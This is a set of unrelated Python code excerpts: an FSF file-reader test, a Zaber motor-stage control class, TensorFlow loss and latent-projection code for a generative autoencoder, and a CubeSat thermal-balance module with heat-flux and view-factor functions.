"\nTestFSFGetFileComment (test_fsf_011_02) : "
"\nInstantiate FSF using read utility and call OpenFile with valid FSF file name."
"GetFileComment from FSF file after forced FileCommentSize as 0.")
# Instantiate FSF Write utility
fsf_read = fsf.FSF_Common(fsf.Mode.READ)
# Set FSF filename
read_file = cmdopt_read_dir + readDataFileName
# Open FSF file for writing
status = fsf_read.OpenFile(read_file)
check_status("fsf_read.OpenFile", status)
assert (status == fsf.Status.SUCCESS)
# Instantiate fsf
fsf_data = FsfData()
# Read file header
status = fsf_read.GetFileHeader(fsf_data.fileHeader)
check_status("fsf_read.GetFileHeader", status)
assert (status == fsf.Status.SUCCESS)
assert (fsf_data.fileHeader is not None)
# Read stream info
fsf_data.streamInfo = [fsf.StreamInfo()] * fsf_data.fileHeader.nStreams
for streamIdx in range(fsf_data.fileHeader.nStreams):
status = fsf_read.GetStreamInfo(streamIdx, fsf_data.streamInfo[streamIdx])
assert (status == fsf.Status.SUCCESS)
check_status("fsf_read.GetStreamInfo: " + str(fsf_data.fileHeader.nStreams) + "streams.", status)
# Read and write optional file header
status = fsf_read.GetOptionalFileHeader(fsf_data.optFileHeader)
check_status("fsf_read.GetOptionalFileHeader", status)
assert (status == fsf.Status.SUCCESS)
# Read and write file comment
fsf_data.fileHeader.FileCommentSize = | |
https://zaber.com/documents/ZaberSpeedSetting.xls
return int(self.accel_units[unit] * accel * 1.6384 * 1e-7 * 1.0 / self.microstep)
def accel_to_unit(self, accel, unit='mm/s2'):
"""
Method to convert acceleration *accel* given in micro steps per square second into *unit*
Parameters
----------
accel : int
acceleration in micro steps per square second
unit : str
unit in which acceleration should be converted. Must be in self.accel_units
"""
# Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
unit = self._check_unit(unit, self.accel_units)
# Return result as float; for conversion formula see: https://zaber.com/documents/ZaberSpeedSetting.xls
return float(1.0 / self.accel_units[unit] * accel / 1.6384 * 1e7 * self.microstep)
def set_accel(self, accel, axis, unit='mm/s2'):
"""
Set the acceleration at which the axis increases speed for move rel and move abs commands
Parameters
----------
accel : float, int
acceleration; float if *unit* is given, else integer in steps
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : str, None
unit in which distance is given. Must be in self.dist_units. If None, get acceleration in steps / s^2
"""
# Check if axis is known
if axis not in (self.x_axis, self.y_axis):
logging.warning("Unknown axis. Abort.")
return
# If unit is given, get acceleration in steps
accel = accel if unit is None else self.accel_to_step_s2(accel, unit)
_max_accel = 32767
# Check whether speed is not larger than maxspeed
if accel > _max_accel:
msg = "Maximum acceleration of this axis is {} m/s^2." \
"Acceleration not updated!".format(self.accel_to_unit(_max_accel, 'm/s2'))
logging.warning(msg)
return
# Issue command and wait for reply and check
_reply = axis.send("set accel {}".format(accel))
self._check_reply(_reply)
return _reply
def get_accel(self, axis, unit='mm/s2'):
"""
Get the acceleration at which the axis increases speed for move rel and move abs commands
Parameters
----------
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : str, None
unit in which acceleration should be converted. Must be in self.accel_units.
If None, get acceleration in steps / s^2
"""
# Check if axis is known
if axis not in (self.x_axis, self.y_axis):
logging.warning("Unknown axis. Abort.")
return
# Issue command and wait for reply and check
_reply = axis.send("get accel")
success = self._check_reply(_reply)
# Get acceleration in steps per square second; 0 if command didn't succeed
accel = 0 if not success else int(_reply.data)
return accel if unit is None else self.accel_to_unit(accel, unit)
def calc_accel(self, speed, distance):
"""
Returns acceleration needed to get to *speed* in *distance*
Parameters
----------
speed : float
speed which should be matched in *distance*
distance : float
distance to travel
"""
return speed**2.0 / (2.0 * distance)
def distance_to_steps(self, distance, unit="mm"):
"""
Method to convert a *distance* given in *unit* into micro steps
Parameters
----------
distance : float
distance of travel
unit : str
unit in which distance is given. Must be in self.dist_units
"""
# Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
unit = self._check_unit(unit, self.dist_units)
return int(self.dist_units[unit] / 1e3 * distance / self.microstep)
    def steps_to_distance(self, steps, unit="mm"):
        """
        Method to convert a *steps* given in distance given in *unit*

        Parameters
        ----------
        steps : int
            distance in steps or position in steps
        unit : str
            unit in which distance is given. Must be in self.dist_units
        """
        # Check if unit is sane; if it checks out, return same unit, else returns smallest available unit
        unit = self._check_unit(unit, self.dist_units)
        # NOTE(review): this divides by 1e-3 (i.e. multiplies by 1e3) and multiplies
        # by self.dist_units[unit], while distance_to_steps divides by 1e3 and also
        # multiplies by self.dist_units[unit]; the two are mutual inverses only if
        # dist_units[unit] == 1. Looks asymmetric -- TODO confirm against the
        # definition of self.dist_units.
        return float(steps * self.microstep * self.dist_units[unit] / 1e-3)
def move_relative(self, distance, axis, unit=None):
"""
Method to move either in vertical or horizontal direction relative to the current position.
Does sanity check on travel destination and axis
Parameters
----------
distance : float
distance of travel
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : None, str
unit in which distance is given. Must be in self.dist_units. If None, interpret as steps
"""
# Get distance in steps
dist_steps = distance if unit is None else self.distance_to_steps(distance, unit)
# Get current position
curr_pos = axis.get_position()
# Get minimum and maximum steps of travel
min_step, max_step = int(axis.send("get limit.min").data), int(axis.send("get limit.max").data)
# Vertical axis is inverted; multiply with distance with -1
if axis is self.y_axis:
dist_steps *= -1
# Check whether there's still room to move
if not min_step <= curr_pos + dist_steps <= max_step:
logging.error("Movement out of travel range. Abort!")
return
# Send command to axis and return reply
_reply = axis.move_rel(dist_steps)
self._check_reply(_reply)
# Update position
self.position = self.get_position()
return _reply
def move_absolute(self, position, axis, unit=None):
"""
Method to move along the given axis to the absolute position
Parameters
----------
position : float, int
distance of travel in steps or float with a unit
axis : zaber.serial.AsciiAxis
either self.x_axis or self.y_axis
unit : None, str
unit in which distance is given. Must be in self.dist_units. If None, interpret as steps
"""
# Get position in steps
pos_steps = position if unit is None else self.distance_to_steps(position, unit)
# Get minimum and maximum steps of travel
min_step, max_step = int(axis.send("get limit.min").data), int(axis.send("get limit.max").data)
# Check whether there's still room to move
if not min_step <= pos_steps <= max_step:
logging.error("Movement out of travel range. Abort!")
return
# Send command to axis and return reply
_reply = axis.move_abs(pos_steps)
self._check_reply(_reply)
# Update position
self.position = self.get_position()
return _reply
def prepare_scan(self, rel_start_point, rel_end_point, scan_speed, step_size, tcp_address, server):
"""
Prepares a scan by storing all needed info in self.scan_params
Parameters
----------
rel_start_point : tuple, list
iterable of starting point (x [mm], y [mm]) relative to current position, defining upper left corner of area
rel_end_point : tuple, list
iterable of end point (x [mm], y [mm]) relative to current position, defining lower right corner of area
scan_speed : float
horizontal scan speed in mm / s
step_size : float
stepp size of vertical steps in mm
tcp_address : str
tcp address to which data of stage is published during scan
server : str
IP address of server which controls the stage
"""
# Store position which is used as origin of relative coordinate system for scan
self.scan_params['origin'] = (self.x_axis.get_position(), self.y_axis.get_position())
# Store starting scan position
self.scan_params['start_pos'] = (self.scan_params['origin'][0] - self.distance_to_steps(rel_start_point[0]),
# inverted y-axis
self.scan_params['origin'][1] + self.distance_to_steps(rel_start_point[1]))
# Store end position of scan
self.scan_params['end_pos'] = (self.scan_params['origin'][0] - self.distance_to_steps(rel_end_point[0]),
# inverted y-axis
self.scan_params['origin'][1] + self.distance_to_steps(rel_end_point[1]))
# Store input args
self.scan_params['speed'] = scan_speed
self.scan_params['step_size'] = step_size
self.scan_params['tcp_address'] = tcp_address
self.scan_params['server'] = server
# Calculate number of rows for the scan
dy = self.distance_to_steps(step_size, unit='mm')
self.scan_params['n_rows'] = int(abs(self.scan_params['end_pos'][1] - self.scan_params['start_pos'][1]) / dy)
# Make dictionary with absolute position (in steps) of each row
rows = [(row, self.scan_params['start_pos'][1] - row * dy) for row in range(self.scan_params['n_rows'])]
self.scan_params['rows'] = dict(rows)
def _check_scan(self, scan_params):
"""
Method to do sanity checks on the *scan_params* dict.
Parameters
----------
scan_params : dict
dict containing all the info for doing a scan of a rectangular area.
If *scan_params* is None, use instance attribute self.scan_params instead.
"""
# Check if dict is empty or not dict
if not scan_params or not isinstance(scan_params, dict):
msg = "Scan parameter dict is empty or not of type dictionary! " \
"Try using prepare_scan method or fill missing info in dict. Abort."
logging.error(msg)
return False
# Check if scan_params dict contains all necessary info
scan_reqs = ('origin', 'start_pos', 'end_pos', 'n_rows', 'rows',
'speed', 'step_size', 'tcp_address', 'server')
missed_reqs = [req for req in scan_reqs if req not in scan_params]
# Return if info is missing
if missed_reqs:
msg = "Scan parameter dict is missing required info: {}. " \
"Try using prepare_scan method or fill missing info in dict. Abort.".format(', '.join(missed_reqs))
logging.error(msg)
return False
return True
def scan_row(self, row, speed=None, scan_params=None):
"""
Method to scan a single row of a device. Uses info about scan parameters from scan_params dict.
Does sanity checks. The actual scan is done in a separate thread which calls self._scan_row.
Parameters
----------
row : int:
Integer of row which should be scanned
speed : float, None
Scan speed in mm/s or | |
backwards to NOT change the discriminator....
crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
real_p_embed_sg, adv_true_layer = _architecture(tf.stop_gradient(real_points), reuse=True)
real_p_embed, _ = _architecture(real_points, reuse=True)
adv_fake = tf.reduce_mean(adv_fake_layer)
adv_true = tf.reduce_mean(adv_true_layer)
adv_c_loss = tf.log(adv_true) - tf.log(adv_fake)
emb_c = tf.reduce_sum(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
emb_c_loss = tf.reduce_mean(emb_c)
return adv_c_loss, emb_c_loss
    def _recon_loss_using_vgg(self, opts, reconstructed_training, real_points, is_training, keep_prob):
        """Build an additional loss using a pretrained VGG in X space.

        Embeds reconstructions and real points with VGG-16 and penalizes the
        L2 distance between the embeddings. Gradients are blocked through the
        real-point embedding (stop_gradient), and the "crazy hack" below keeps
        the VGG weights out of the backward pass for the reconstruction term.

        Args:
            opts: options dict; reads 'vgg_layer' and 'data_dir'.
            reconstructed_training: tensor of reconstructed images.
            real_points: tensor of real images.
            is_training: bool tensor forwarded to vgg_16.
            keep_prob: dropout keep probability forwarded to vgg_16.

        Returns:
            Scalar loss tensor over the VGG embedding space.
        """
        def _architecture(_inputs, reuse=None):
            # Run VGG-16 and select the embedding according to opts['vgg_layer'].
            _, end_points = vgg_16(_inputs, is_training=is_training, dropout_keep_prob=keep_prob, reuse=reuse)
            layer_name = opts['vgg_layer']
            if layer_name == 'concat':
                # Concatenate flattened pool1..pool3 activations.
                outputs = []
                for ln in ['pool1', 'pool2', 'pool3']:
                    output = end_points[ln]
                    output = flatten(output)
                    outputs.append(output)
                output = tf.concat(outputs, 1)
            elif layer_name.startswith('concat_w'):
                # Format 'concat_w,w1,w2,w3,w4,w5': weighted concat of pool1..pool5.
                weights = layer_name.split(',')[1:]
                assert len(weights) == 5
                outputs = []
                for lnum in range(5):
                    num = lnum + 1
                    ln = 'pool%d' % num
                    output = end_points[lnum]
                    output = flatten(output)
                    # We sqrt the weight here because we use L2 after.
                    outputs.append(np.sqrt(float(weights[lnum])) * output)
                output = tf.concat(outputs, 1)
            else:
                # A single named VGG endpoint.
                output = end_points[layer_name]
                output = flatten(output)
            if reuse is None:
                # First instantiation only: schedule restoring pretrained VGG weights.
                variables_to_restore = slim.get_variables_to_restore(include=['vgg_16'])
                path = os.path.join(opts['data_dir'], 'vgg_16.ckpt')
                # '/tmpp/models/vgg_16.ckpt'
                init_assign_op, init_feed_dict = slim.assign_from_checkpoint(path, variables_to_restore)
                self._additional_init_ops += [init_assign_op]
                self._init_feed_dict.update(init_feed_dict)
            return output
        reconstructed_embed_sg = _architecture(tf.stop_gradient(reconstructed_training), reuse=None)
        reconstructed_embed = _architecture(reconstructed_training, reuse=True)
        # Below line enforces the forward to be reconstructed_embed and backwards to NOT change the discriminator....
        crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
        real_p_embed = _architecture(real_points, reuse=True)
        emb_c = tf.reduce_mean(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
        emb_c_loss = tf.reduce_mean(tf.sqrt(emb_c + 1e-5))
        # emb_c_loss = tf.Print(emb_c_loss, [emb_c_loss], "emb_c_loss")
        # # Normalize the loss, so that it does not depend on how good the
        # # discriminator is.
        # emb_c_loss = emb_c_loss / tf.stop_gradient(emb_c_loss)
        return emb_c_loss
def _recon_loss_using_moments(self, opts, reconstructed_training, real_points, is_training, keep_prob):
"""Build an additional loss using moments."""
def _architecture(_inputs):
return compute_moments(_inputs, moments=[2]) # TODO
reconstructed_embed = _architecture(reconstructed_training)
real_p_embed = _architecture(real_points)
emb_c = tf.reduce_mean(tf.square(reconstructed_embed - tf.stop_gradient(real_p_embed)), 1)
# emb_c = tf.Print(emb_c, [emb_c], "emb_c")
emb_c_loss = tf.reduce_mean(emb_c)
return emb_c_loss * 100.0 * 100.0 # TODO: constant.
    def _recon_loss_using_vgg_moments(self, opts, reconstructed_training, real_points, is_training, keep_prob):
        """Build an additional loss using a pretrained VGG in X space.

        Variant of _recon_loss_using_vgg: the embedding is the per-feature
        variance (2nd moment, via compute_moments) of the chosen VGG layer.
        """
        def _architecture(_inputs, reuse=None):
            # Run VGG-16 and reduce the chosen endpoint to 2nd-moment statistics.
            _, end_points = vgg_16(_inputs, is_training=is_training, dropout_keep_prob=keep_prob, reuse=reuse)
            layer_name = opts['vgg_layer']
            output = end_points[layer_name]
            # output = flatten(output)
            output /= 255.0  # the vgg_16 method scales everything by 255.0, so we divide back here.
            variances = compute_moments(output, moments=[2])
            if reuse is None:
                # First instantiation only: schedule restoring pretrained VGG weights.
                variables_to_restore = slim.get_variables_to_restore(include=['vgg_16'])
                path = os.path.join(opts['data_dir'], 'vgg_16.ckpt')
                # '/tmpp/models/vgg_16.ckpt'
                init_assign_op, init_feed_dict = slim.assign_from_checkpoint(path, variables_to_restore)
                self._additional_init_ops += [init_assign_op]
                self._init_feed_dict.update(init_feed_dict)
            return variances
        reconstructed_embed_sg = _architecture(tf.stop_gradient(reconstructed_training), reuse=None)
        reconstructed_embed = _architecture(reconstructed_training, reuse=True)
        # Below line enforces the forward to be reconstructed_embed and backwards to NOT change the discriminator....
        crazy_hack = reconstructed_embed-reconstructed_embed_sg+tf.stop_gradient(reconstructed_embed_sg)
        real_p_embed = _architecture(real_points, reuse=True)
        emb_c = tf.reduce_mean(tf.square(crazy_hack - tf.stop_gradient(real_p_embed)), 1)
        emb_c_loss = tf.reduce_mean(emb_c)
        # emb_c_loss = tf.Print(emb_c_loss, [emb_c_loss], "emb_c_loss")
        # # Normalize the loss, so that it does not depend on how good the
        # # discriminator is.
        # emb_c_loss = emb_c_loss / tf.stop_gradient(emb_c_loss)
        return emb_c_loss  # TODO: constant.
    def add_least_gaussian2d_ops(self, opts):
        """ Add ops searching for the 2d plane in z_dim hidden space
        corresponding to the 'least Gaussian' look of the sample

        Builds a trainable orthonormal 2-column projection (proj_v, proj_u),
        projects the fed sample onto it, and maximizes the L2 distance between
        the projected sample's covariance/mean and those of an isotropic
        Gaussian. Handles for the placeholder, loss and optimizer are stored
        on self for later use by least_gaussian_2d.
        """
        with tf.variable_scope('leastGaussian2d'):
            # Projection matrix which we are going to tune
            sample_ph = tf.placeholder(
                tf.float32, [None, opts['latent_space_dim']],
                name='sample_ph')
            v = tf.get_variable(
                "proj_v", [opts['latent_space_dim'], 1],
                tf.float32, tf.random_normal_initializer(stddev=1.))
            u = tf.get_variable(
                "proj_u", [opts['latent_space_dim'], 1],
                tf.float32, tf.random_normal_initializer(stddev=1.))
            npoints = tf.cast(tf.shape(sample_ph)[0], tf.int32)
            # First we need to make sure projection matrix is orthogonal
            # (Gram-Schmidt: normalize v, remove v-component from u, normalize)
            v_norm = tf.nn.l2_normalize(v, 0)
            dotprod = tf.reduce_sum(tf.multiply(u, v_norm))
            u_ort = u - dotprod * v_norm
            u_norm = tf.nn.l2_normalize(u_ort, 0)
            Mproj = tf.concat([v_norm, u_norm], 1)
            sample_proj = tf.matmul(sample_ph, Mproj)
            # Center the projected sample: a is the centering matrix I - 11^T/n
            a = tf.eye(npoints) - tf.ones([npoints, npoints]) / tf.cast(npoints, tf.float32)
            b = tf.matmul(sample_proj, tf.matmul(a, a), transpose_a=True)
            b = tf.matmul(b, sample_proj)
            # Sample covariance matrix
            covhat = b / (tf.cast(npoints, tf.float32) - 1)
            # covhat = tf.Print(covhat, [covhat], 'Cov:')
        # NOTE(review): re-entering a scope with the same name here creates a
        # uniquified name scope for these ops (no variables are created, so
        # get_variable reuse is not an issue) -- presumably intentional; confirm.
        with tf.variable_scope('leastGaussian2d'):
            # Target covariance of the isotropic Gaussian prior
            gcov = opts['pot_pz_std'] * opts['pot_pz_std'] * tf.eye(2)
            # l2 distance between sample cov and the Gaussian cov
            projloss = tf.reduce_sum(tf.square(covhat - gcov))
            # Also account for the first moment, i.e. expected value
            projloss += tf.reduce_sum(tf.square(tf.reduce_mean(sample_proj, 0)))
            # We are maximizing
            projloss = -projloss
            optim = tf.train.AdamOptimizer(0.001, 0.9)
            optim = optim.minimize(projloss, var_list=[v, u])
        # Expose handles for least_gaussian_2d
        self._proj_u = u_norm
        self._proj_v = v_norm
        self._proj_sample_ph = sample_ph
        self._proj_covhat = covhat
        self._proj_loss = projloss
        self._proj_optim = optim
    def least_gaussian_2d(self, opts, X):
        """
        Given a sample X of shape (n_points, n_z) find 2d plain
        such that projection looks least gaussian.

        Runs the optimizer built by add_least_gaussian2d_ops from 3 random
        restarts, keeping the projection with the lowest (most negative) loss.

        Returns:
            (proj_mat, dot_prod): the best 2-column projection matrix and the
            dot product of its (unnormalized) columns.
        """
        with self._session.as_default(), self._session.graph.as_default():
            # Handles created by add_least_gaussian2d_ops
            sample_ph = self._proj_sample_ph
            optim = self._proj_optim
            loss = self._proj_loss
            u = self._proj_u
            v = self._proj_v
            covhat = self._proj_covhat
            proj_mat = tf.concat([v, u], 1).eval()
            dot_prod = -1
            best_of_runs = 10e5  # Any positive value would do
            updated = False
            for _start in xrange(3):
                # We will run 3 times from random inits
                loss_prev = 10e5  # Any positive value would do
                # Re-initialize the projection variables for this restart
                proj_vars = tf.get_collection(
                    tf.GraphKeys.GLOBAL_VARIABLES, scope="leastGaussian2d")
                self._session.run(tf.variables_initializer(proj_vars))
                step = 0
                for _ in xrange(5000):
                    self._session.run(optim, feed_dict={sample_ph:X})
                    step += 1
                    # Every 10 steps, stop early once relative improvement stalls
                    if step % 10 == 0:
                        loss_cur = loss.eval(feed_dict={sample_ph: X})
                        rel_imp = abs(loss_cur - loss_prev) / abs(loss_prev)
                        if rel_imp < 1e-2:
                            break
                        loss_prev = loss_cur
                loss_final = loss.eval(feed_dict={sample_ph: X})
                # Keep the best restart
                if loss_final < best_of_runs:
                    updated = True
                    best_of_runs = loss_final
                    proj_mat = tf.concat([v, u], 1).eval()
                    dot_prod = tf.reduce_sum(tf.multiply(u, v)).eval()
        if not updated:
            logging.error('WARNING: possible bug in the worst 2d projection')
        return proj_mat, dot_prod
def _build_model_internal(self, opts):
"""Build the Graph corresponding to POT implementation.
"""
data_shape = self._data.data_shape
additional_losses = collections.OrderedDict()
# Placeholders
real_points_ph = tf.placeholder(
tf.float32, [None] + list(data_shape), name='real_points_ph')
noise_ph = tf.placeholder(
tf.float32, [None] + [opts['latent_space_dim']], name='noise_ph')
enc_noise_ph = tf.placeholder(
tf.float32, [None] + [opts['latent_space_dim']], name='enc_noise_ph')
lr_decay_ph = tf.placeholder(tf.float32)
is_training_ph = tf.placeholder(tf.bool, name='is_training_ph')
keep_prob_ph = tf.placeholder(tf.float32, name='keep_prob_ph')
# Operations
if opts['pz_transform']:
assert opts['z_test'] == 'gan', 'Pz transforms are currently allowed only for POT+GAN'
noise = self.pz_sampler(opts, noise_ph)
else:
noise = noise_ph
real_points = self._data_augmentation(
opts, real_points_ph, is_training_ph)
if opts['e_is_random']:
# If encoder is random we map the training points
# to the expectation of Q(Z|X) and then add the scaled
# Gaussian noise corresponding to the learned sigmas
enc_train_mean, enc_log_sigmas = self.encoder(
opts, real_points,
is_training=is_training_ph, keep_prob=keep_prob_ph)
# enc_log_sigmas = tf.Print(enc_log_sigmas, [tf.reduce_max(enc_log_sigmas),
# tf.reduce_min(enc_log_sigmas),
# tf.reduce_mean(enc_log_sigmas)], 'Log sigmas:')
# enc_log_sigmas = tf.Print(enc_log_sigmas, [tf.slice(enc_log_sigmas, [0,0], [1,-1])], 'Log sigmas:')
# stds = tf.sqrt(tf.exp(enc_log_sigmas) + 1e-05)
stds = tf.sqrt(tf.nn.relu(enc_log_sigmas) + 1e-05)
# stds = tf.Print(stds, [stds[0], stds[1], stds[2], stds[3]], 'Stds: ')
# stds = tf.Print(stds, [enc_train_mean[0], enc_train_mean[1], enc_train_mean[2]], 'Means: ')
scaled_noise = tf.multiply(stds, enc_noise_ph)
encoded_training = enc_train_mean + scaled_noise
else:
encoded_training = self.encoder(
opts, real_points,
is_training=is_training_ph, keep_prob=keep_prob_ph)
reconstructed_training = self.generator(
opts, encoded_training,
is_training=is_training_ph, keep_prob=keep_prob_ph)
reconstructed_training.set_shape(real_points.get_shape())
if opts['recon_loss'] == 'l2':
# c(x,y) = ||x - y||_2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=1)
# sqrt(x + delta) guarantees the direvative 1/(x + delta) is finite
loss_reconstr = tf.reduce_mean(tf.sqrt(loss_reconstr + 1e-08))
elif opts['recon_loss'] == 'l2f':
# c(x,y) = ||x - y||_2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=[1, 2, 3])
loss_reconstr = tf.reduce_mean(tf.sqrt(1e-08 + loss_reconstr)) * 0.2
elif opts['recon_loss'] == 'l2sq':
# c(x,y) = ||x - y||_2^2
loss_reconstr = tf.reduce_sum(
tf.square(real_points - reconstructed_training), axis=[1, 2, 3])
loss_reconstr = tf.reduce_mean(loss_reconstr) * 0.05
elif opts['recon_loss'] == 'l1':
# c(x,y) = ||x - y||_1
loss_reconstr = tf.reduce_mean(tf.reduce_sum(
tf.abs(real_points - reconstructed_training), axis=[1, 2, 3])) * 0.02
else:
assert False
# Pearson independence test of coordinates in Z space
loss_z_corr = self.correlation_loss(opts, encoded_training)
# Perform a Qz = Pz goodness of fit test based on Stein Discrepancy
if opts['z_test'] == 'gan':
# Pz = Qz test based on GAN in the Z space
d_logits_Pz = self.discriminator(opts, noise)
d_logits_Qz = self.discriminator(opts, encoded_training, reuse=True)
d_loss_Pz = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Pz, labels=tf.ones_like(d_logits_Pz)))
d_loss_Qz = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Qz, labels=tf.zeros_like(d_logits_Qz)))
d_loss_Qz_trick = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=d_logits_Qz, labels=tf.ones_like(d_logits_Qz)))
d_loss = opts['pot_lambda'] * (d_loss_Pz + d_loss_Qz)
if opts['pz_transform']:
loss_match = d_loss_Qz_trick - d_loss_Pz
else:
loss_match = d_loss_Qz_trick
elif opts['z_test'] == 'mmd':
# Pz = Qz test based on MMD(Pz, Qz)
loss_match = self.discriminator_mmd_test(opts, encoded_training, noise)
d_loss = None
d_logits_Pz = None
d_logits_Qz = None
elif opts['z_test'] == 'lks':
# Pz = Qz test without adversarial training
# based on Kernel Stein Discrepancy
# Uncomment next line to check for the real Pz
# loss_match = self.discriminator_test(opts, noise_ph)
| |
<filename>notebooks/sputnikTools.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
### numerical model specifications and physical constants
def getPhysConstants():
    """Return a dict of the physical constants used by the thermal model."""
    return {
        'RE': 6371.0,                  # Earth's radius in km
        'sigSB': 5.6703*(10**-8),      # Stefan-Boltzmann constant
        'KelToCel': 273.15,            # 0 C in Kelvin
    }
def getInputParamsDefault():
    """Return the default input-parameter dict for the thermal model."""
    physConst = getPhysConstants()
    params = {}
    ## environment (radiation from Sun and Earth)
    params['Fsun'] = 1372    # solar flux, W/m2
    params['FIR'] = 240      # Earth's IR flux, W/m2
    params['rhoE'] = 0.3     # Earth's reflectivity
    ## orbit
    params['h'] = 550.0      # in km, orbit's altitude
    params['PorbMin'] = 90   # orbital period in minutes
    params['etaP'] = 0.33    # fraction of orbit in eclipse
    params['falb'] = 0.62    # correction for albedo variation
                             # (for polar orbit facing Sun: 0.06)
    # view factor
    RE = physConst['RE']
    params['fE'] = (RE / (RE + params['h']))**2
    ## satellite
    # area
    params['Atot'] = 0.10    # in m2, as 2U CubeSat
    params['etaS'] = 0.25    # effective area ratio, sphere, point source
    # effective area ratio towards Earth: the sphere/hemisphere value (0.50)
    # corrected for the incomplete hemisphere -- effectively the two-sphere
    # viewing factor multiplied by fE
    params['etaE'] = 0.50 * (1 - np.sqrt(1 - params['fE'])) / params['fE']
    # surface emissivity
    params['alphaS'] = 0.86  # black anodized Al
    params['epsT'] = 0.86    # black anodized Al
    params['alphaIR'] = params['epsT']  # usual ansatz
    # thermal inertia
    params['mass'] = 2.0     # kg (n.b. implies density)
    params['C'] = 921.0      # J/kg/K, aluminum
    # battery charging/power dissipation
    params['etaCell'] = 0.2  # fraction of energy for charging
    return params
def getInputParamsHot(params=""):
    """Return input parameters modified for the hot case.

    An empty-string *params* (the sentinel default) loads the defaults first;
    otherwise the passed dict is modified in place and returned.
    """
    if params == "":
        params = getInputParamsDefault()
    # environment (radiation from Sun and Earth): hot extremes
    params['Fsun'] = 1422   # solar flux, W/m2
    params['FIR'] = 260     # Earth's IR flux, W/m2
    params['rhoE'] = 0.35   # Earth's reflectivity
    # orbit
    params['etaP'] = 0.0    # no eclipse in beta=90 (terminator) orbit
    params['falb'] = 0.06   # correction for albedo in hot orbit
    return params
def getInputParamsCold(params=""):
    """Return input parameters modified for the cold case.

    An empty-string *params* (the sentinel default) loads the defaults first;
    otherwise the passed dict is modified in place and returned.
    """
    if params == "":
        params = getInputParamsDefault()
    # environment (radiation from Sun and Earth): cold extremes
    params['Fsun'] = 1322   # solar flux, W/m2
    params['FIR'] = 220     # Earth's IR flux, W/m2
    params['rhoE'] = 0.25   # Earth's reflectivity
    return params
### heat flux and equilibrium temperature evaluations
def getQsun(p):
    """Direct solar heat input [W] absorbed by the satellite."""
    effective_area = p['etaS'] * p['Atot']
    return effective_area * p['alphaS'] * p['Fsun']
def getQref(p):
    """Earth-albedo (reflected sunlight) heat input [W]."""
    view = p['fE'] * p['etaE'] * p['Atot']
    return view * p['falb'] * p['rhoE'] * p['alphaS'] * p['Fsun']
def getQIR(p):
    """Earth infrared heat input [W]."""
    view = p['fE'] * p['etaE'] * p['Atot']
    return view * p['alphaIR'] * p['FIR']
def getQdissip(p):
    """Internally dissipated power [W]: energy harvested while sunlit, released as heat."""
    sunlit_fraction = 1 - p['etaP']
    return p['etaCell'] * sunlit_fraction * (getQsun(p) + getQref(p))
def getQin(p):
    """Return (QinSun, QinEclipse): total heat input [W] while sunlit and in eclipse.

    The sunlit term keeps the fraction of absorbed solar power not diverted to
    battery charging (etaCell weighted by the eclipse fraction etaP); the
    eclipse term is Earth IR plus the internally dissipated power.
    """
    QinSun = (1-p['etaCell']*p['etaP'])*(getQsun(p)+getQref(p)) + getQIR(p)
    QinEclipse = getQIR(p) + getQdissip(p)
    return QinSun, QinEclipse
def getAllHeatQ(p):
    """Return all four heat inputs (Qsun, Qref, QIR, Qdissip) as a tuple."""
    return getQsun(p), getQref(p), getQIR(p), getQdissip(p)
## equilibrium temperatures
def getTeq(Qin, p):
    """Equilibrium temperature [K] for heat input *Qin* from the Stefan-Boltzmann balance."""
    sigSB = getPhysConstants()['sigSB']
    radiator = p['Atot'] * p['epsT'] * sigSB
    return (Qin / radiator) ** 0.25
# return the view factor divided by fE=(RE/(RE+altitude))^2
# here fE = 1/h^2
def getF12h2(h, beta):
    """
    Return the Earth view factor divided by fE = (RE/(RE+altitude))^2
    (i.e. here fE = 1/h^2) for a surface tilted by *beta* degrees.

    Parameters
    ----------
    h : float
        orbit radius in Earth radii, (RE + altitude) / RE
    beta : float
        tilt angle in degrees
    """
    deg_per_rad = 180 / np.pi
    brad = beta / deg_per_rad
    # Earth disc fully visible: the view factor reduces to cos(beta)
    if brad <= np.arccos(1 / h):
        return np.cos(brad)
    x = np.sqrt(h ** 2 - 1)
    y = -x / np.tan(brad)
    # Earth entirely below the surface's horizon
    if y > 1:
        return 0
    z = np.sqrt(1 - y ** 2)
    t1 = np.cos(brad) * np.arccos(y) - x * np.sin(brad) * z
    t2 = np.arctan(np.sin(brad) * z / x)
    return (t1 + t2 * h ** 2) / np.pi
def getEffectiveAreas2U(h, beta):
    """
    View-factor weighted effective area fraction of a 2U CubeSat,
    summed over all faces and normalized by the 10 unit faces.

    Parameters
    ----------
    h : float
        orbit radius in Earth radii, (RE + altitude) / RE
    beta : float
        orientation angle in degrees; values outside 0..180 return 0
    """
    if beta < 0 or beta > 180:
        return 0
    # Fold angles above 90 degrees back by symmetry
    if beta > 90:
        beta = 180 - beta
    faces = (
        getF12h2(h, beta),                   # small side towards Earth
        getF12h2(h, 180 - beta),             # the "other" small side
        2 * getF12h2(h, beta + 90),          # long 2U side "towards" Earth
        2 * getF12h2(h, 180 - (beta + 90)),  # long 2U side "away from" Earth
        2 * 2 * getF12h2(h, 90),             # 2 long 2U sides "perpendicular to" Earth
    )
    return sum(faces) / 10
def getEffectiveAreas1U(h, beta):
    """
    View-factor weighted effective area fraction of a 1U CubeSat,
    summed over all faces and normalized by the 6 unit faces.

    Parameters
    ----------
    h : float
        orbit radius in Earth radii, (RE + altitude) / RE
    beta : float
        orientation angle in degrees; values outside 0..180 return 0
    """
    if beta < 0 or beta > 180:
        return 0
    # Fold angles above 90 degrees back by symmetry
    if beta > 90:
